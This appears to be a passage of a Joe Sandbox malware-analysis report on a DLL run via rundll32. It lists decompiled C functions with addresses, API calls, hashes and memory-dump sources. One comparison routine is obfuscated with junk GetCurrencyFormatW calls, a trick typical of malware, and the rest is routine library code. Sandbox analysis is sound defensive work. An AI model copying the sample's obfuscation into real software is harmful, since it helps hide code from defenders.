					_v4 = _v4 & 0x00000000;
					if(E10001380(_a4) <= 0) {
						L12:
						_t34 = 0;
						L13:
						return _t34;
					}
					_t76 = L"xadqsavcbdfewescGADW";
					_t56 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t36 =  *_a4 & 0x0000ffff;
						_v8 = _t36;
						_v12 =  *_a8 & 0x0000ffff;
						if(_t36 >= 0x41 && (_v8 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440dc + 0x5a) {
							_v8 = _v8 + GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20;
						}
						if(_v12 >= 0x41 && (_v12 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x5a) {
							_t19 = GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20; // 0x61
							_v12 = _v12 + _t19;
						}
						if(_v8 != _v12) {
							break;
						}
						_a4 =  &(_a4[1]);
						_v4 = _v4 + 1;
						_a8 =  &(_a8[1]);
						if(_v4 < E10001380(_a4)) {
							continue;
						}
						goto L12;
					}
					_t34 = 1;
					goto L13;
				}
				return 1;
			}











                                                                                                            0x1000139c
                                                                                                            0x100013b0
                                                                                                            0x100013ba
                                                                                                            0x100013cf
                                                                                                            0x100014c0
                                                                                                            0x100014c0
                                                                                                            0x100014c2
                                                                                                            0x00000000
                                                                                                            0x100014c5
                                                                                                            0x100013db
                                                                                                            0x100013e0
                                                                                                            0x100013ea
                                                                                                            0x100013ee
                                                                                                            0x100013fc
                                                                                                            0x10001400
                                                                                                            0x10001404
                                                                                                            0x10001444
                                                                                                            0x10001444
                                                                                                            0x1000144e
                                                                                                            0x1000148a
                                                                                                            0x1000148e
                                                                                                            0x1000148e
                                                                                                            0x1000149c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000149e
                                                                                                            0x100014a7
                                                                                                            0x100014ab
                                                                                                            0x100014ba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100014ba
                                                                                                            0x100014cc
                                                                                                            0x00000000
                                                                                                            0x100014cc
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001412
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001433
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000145C
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000147D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: A$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-1548561649
                                                                                                            • Opcode ID: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
                                                                                                            • Instruction ID: 41e55657c6f233ddb2d2aa4512fb1aa83921a4b3024967986a1fac65e9f116a1
                                                                                                            • Opcode Fuzzy Hash: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
                                                                                                            • Instruction Fuzzy Hash: 8B31E434608346AFE704DF51DC81F6BBBE8FB85789F10481EFA84961D0E7B49948CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016311 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10016311(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E1001FBC4(E100340BB, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E10014BD2(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x1003b26c, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E1001FC9C(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x1003b2fc, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E100131E9(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E1001E462(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E100131AB(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x1003b30c);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E100149D9(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x1003b1ec, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}











































                                                                                                            0x10016311
                                                                                                            0x10016318
                                                                                                            0x1001631d
                                                                                                            0x1001631f
                                                                                                            0x10016324
                                                                                                            0x10016329
                                                                                                            0x1001632c
                                                                                                            0x1001634d
                                                                                                            0x10016353
                                                                                                            0x10016356
                                                                                                            0x10016359
                                                                                                            0x1001635c
                                                                                                            0x10016365
                                                                                                            0x1001636d
                                                                                                            0x10016370
                                                                                                            0x100163a3
                                                                                                            0x100163a3
                                                                                                            0x100163a8
                                                                                                            0x1001640d
                                                                                                            0x10016410
                                                                                                            0x1001647c
                                                                                                            0x1001647c
                                                                                                            0x10016480
                                                                                                            0x1001648a
                                                                                                            0x1001648c
                                                                                                            0x1001648e
                                                                                                            0x100165dd
                                                                                                            0x100165e0
                                                                                                            0x100165fa
                                                                                                            0x100165fa
                                                                                                            0x100165ff
                                                                                                            0x10016604
                                                                                                            0x10016604
                                                                                                            0x1001660a
                                                                                                            0x10016611
                                                                                                            0x10016611
                                                                                                            0x10016618
                                                                                                            0x1001661b
                                                                                                            0x10016620
                                                                                                            0x10016620
                                                                                                            0x100165e2
                                                                                                            0x100165e2
                                                                                                            0x100165e6
                                                                                                            0x100165ed
                                                                                                            0x100165f0
                                                                                                            0x100165f5
                                                                                                            0x100165f8
                                                                                                            0x100165f8
                                                                                                            0x00000000
                                                                                                            0x100165e6
                                                                                                            0x10016494
                                                                                                            0x10016496
                                                                                                            0x100164f0
                                                                                                            0x100164f3
                                                                                                            0x100165a5
                                                                                                            0x100165ac
                                                                                                            0x100165ac
                                                                                                            0x100165af
                                                                                                            0x100165b2
                                                                                                            0x100165b5
                                                                                                            0x100165b8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100165bd
                                                                                                            0x100165bf
                                                                                                            0x100165c9
                                                                                                            0x100165cb
                                                                                                            0x100165da
                                                                                                            0x100165da
                                                                                                            0x100165c9
                                                                                                            0x00000000
                                                                                                            0x100165bd
                                                                                                            0x100164fd
                                                                                                            0x10016500
                                                                                                            0x10016502
                                                                                                            0x10016505
                                                                                                            0x1001653e
                                                                                                            0x1001653e
                                                                                                            0x10016545
                                                                                                            0x10016548
                                                                                                            0x10016548
                                                                                                            0x1001654b
                                                                                                            0x1001654e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016550
                                                                                                            0x10016559
                                                                                                            0x1001655f
                                                                                                            0x10016561
                                                                                                            0x10016564
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016566
                                                                                                            0x10016572
                                                                                                            0x10016575
                                                                                                            0x1001657b
                                                                                                            0x1001657d
                                                                                                            0x10016580
                                                                                                            0x10016582
                                                                                                            0x1001658e
                                                                                                            0x10016591
                                                                                                            0x10016597
                                                                                                            0x10016597
                                                                                                            0x1001659a
                                                                                                            0x1001659d
                                                                                                            0x100165a0
                                                                                                            0x00000000
                                                                                                            0x100165a0
                                                                                                            0x10016507
                                                                                                            0x1001650e
                                                                                                            0x10016510
                                                                                                            0x10016516
                                                                                                            0x10016518
                                                                                                            0x1001651b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001651e
                                                                                                            0x10016524
                                                                                                            0x10016526
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016530
                                                                                                            0x10016536
                                                                                                            0x00000000
                                                                                                            0x10016536
                                                                                                            0x10016509
                                                                                                            0x1001650c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001650c
                                                                                                            0x10016498
                                                                                                            0x1001649f
                                                                                                            0x100164a2
                                                                                                            0x100164a8
                                                                                                            0x100164aa
                                                                                                            0x100164ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100164b3
                                                                                                            0x100164c0
                                                                                                            0x100164c3
                                                                                                            0x100164c9
                                                                                                            0x100164cb
                                                                                                            0x100164ce
                                                                                                            0x100164d0
                                                                                                            0x100164dc
                                                                                                            0x100164df
                                                                                                            0x100164e5
                                                                                                            0x100164e5
                                                                                                            0x100164e8
                                                                                                            0x00000000
                                                                                                            0x100164e8
                                                                                                            0x10016412
                                                                                                            0x10016412
                                                                                                            0x10016416
                                                                                                            0x10016420
                                                                                                            0x10016422
                                                                                                            0x10016424
                                                                                                            0x00000000
                                                                                                            0x10016426
                                                                                                            0x10016426
                                                                                                            0x10016428
                                                                                                            0x10016444
                                                                                                            0x10016450
                                                                                                            0x10016453
                                                                                                            0x10016458
                                                                                                            0x10016462
                                                                                                            0x10016465
                                                                                                            0x10016465
                                                                                                            0x10016465
                                                                                                            0x1001646c
                                                                                                            0x1001646f
                                                                                                            0x1001642a
                                                                                                            0x1001642a
                                                                                                            0x10016433
                                                                                                            0x10016433
                                                                                                            0x10016474
                                                                                                            0x00000000
                                                                                                            0x10016474
                                                                                                            0x10016424
                                                                                                            0x100163ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100163b3
                                                                                                            0x100163ba
                                                                                                            0x100163bb
                                                                                                            0x100163c0
                                                                                                            0x100163c5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100163c9
                                                                                                            0x100163ca
                                                                                                            0x100163cb
                                                                                                            0x100163cc
                                                                                                            0x100163d5
                                                                                                            0x00000000
                                                                                                            0x100163d7
                                                                                                            0x100163e6
                                                                                                            0x100163e9
                                                                                                            0x100163ec
                                                                                                            0x100163f9
                                                                                                            0x100163fc
                                                                                                            0x10016402
                                                                                                            0x10016405
                                                                                                            0x00000000
                                                                                                            0x10016405
                                                                                                            0x100163d5
                                                                                                            0x10016372
                                                                                                            0x1001637d
                                                                                                            0x10016387
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016389
                                                                                                            0x10016395
                                                                                                            0x1001639a
                                                                                                            0x1001639d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001639d
                                                                                                            0x1001633d
                                                                                                            0x10016344
                                                                                                            0x10016347
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10016318
                                                                                                              • Part of subcall function 100149D9: SysStringLen.OLEAUT32(?), ref: 100149E1
                                                                                                              • Part of subcall function 100149D9: CoGetClassObject.OLE32(?,?,00000000,1003B22C,?), ref: 100149FF
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 100164A2
                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 100164C3
                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10016510
                                                                                                            • GlobalLock.KERNEL32 ref: 1001651E
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 10016536
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10016559
                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10016575
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 317715441-0
                                                                                                            • Opcode ID: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
                                                                                                            • Instruction ID: 65bcce977c73c7d4b95501f4a81464407c87b4e582750ec1064cf11d2baf797c
                                                                                                            • Opcode Fuzzy Hash: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
                                                                                                            • Instruction Fuzzy Hash: 20C108B090065ADFDB00DFA4CC889AEB7BAFF48344F504969F916EB251C771DA91CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005BC3 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E10005BC3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E100110BD(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100110BD( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                                                            0x10005bc6
                                                                                                            0x10005bc8
                                                                                                            0x10005bca
                                                                                                            0x10005bd2
                                                                                                            0x10005bec
                                                                                                            0x10005bf4
                                                                                                            0x10005bfe
                                                                                                            0x10005c05
                                                                                                            0x10005c07
                                                                                                            0x10005c0c
                                                                                                            0x10005c0f
                                                                                                            0x10005c0f
                                                                                                            0x10005c26
                                                                                                            0x10005c2d
                                                                                                            0x10005c45
                                                                                                            0x10005c4a
                                                                                                            0x10005c4f
                                                                                                            0x10005c4f
                                                                                                            0x10005c55
                                                                                                            0x10005c55
                                                                                                            0x10005c05
                                                                                                            0x10005c5a
                                                                                                            0x10005c5e

                                                                                                            APIs
                                                                                                            • GlobalLock.KERNEL32 ref: 10005BE0
                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 10005BEC
                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10005BFE
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C1E
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C26
                                                                                                            • GlobalLock.KERNEL32 ref: 10005C30
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10005C3D
                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10005C55
                                                                                                              • Part of subcall function 100110BD: GlobalFlags.KERNEL32(?), ref: 100110C8
                                                                                                              • Part of subcall function 100110BD: GlobalUnlock.KERNEL32(?,?,00000000,10005C4F,?,00000000,?,?,00000000,00000000,00000002), ref: 100110DA
                                                                                                              • Part of subcall function 100110BD: GlobalFree.KERNEL32 ref: 100110E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 168474834-0
                                                                                                            • Opcode ID: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
                                                                                                            • Instruction ID: 834996e4caf1481c9af349bd82c863b941331106e3d5840b272905be7d33e105
                                                                                                            • Opcode Fuzzy Hash: ebc32e4390c48c151e0b1777109bbc4563f4b747fd47ac077490b5256f26b009
                                                                                                            • Instruction Fuzzy Hash: D3114875500A04BEEB129BA6CD89CAF7AEDEB89781B104519FA01D9122DA32E981D760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010DF8 Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10010DF8(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x10048618 = GetSystemMetrics(2) + 1;
				 *0x1004861c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}





                                                                                                            0x10010e03
                                                                                                            0x10010e09
                                                                                                            0x10010e10
                                                                                                            0x10010e18
                                                                                                            0x10010e22
                                                                                                            0x10010e33
                                                                                                            0x10010e3d
                                                                                                            0x10010e45
                                                                                                            0x10010e51

                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32 ref: 10010E05
                                                                                                            • GetSystemMetrics.USER32 ref: 10010E0C
                                                                                                            • GetSystemMetrics.USER32 ref: 10010E13
                                                                                                            • GetSystemMetrics.USER32 ref: 10010E1D
                                                                                                            • GetDC.USER32(00000000), ref: 10010E27
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 10010E38
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10010E40
                                                                                                            • ReleaseDC.USER32 ref: 10010E48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
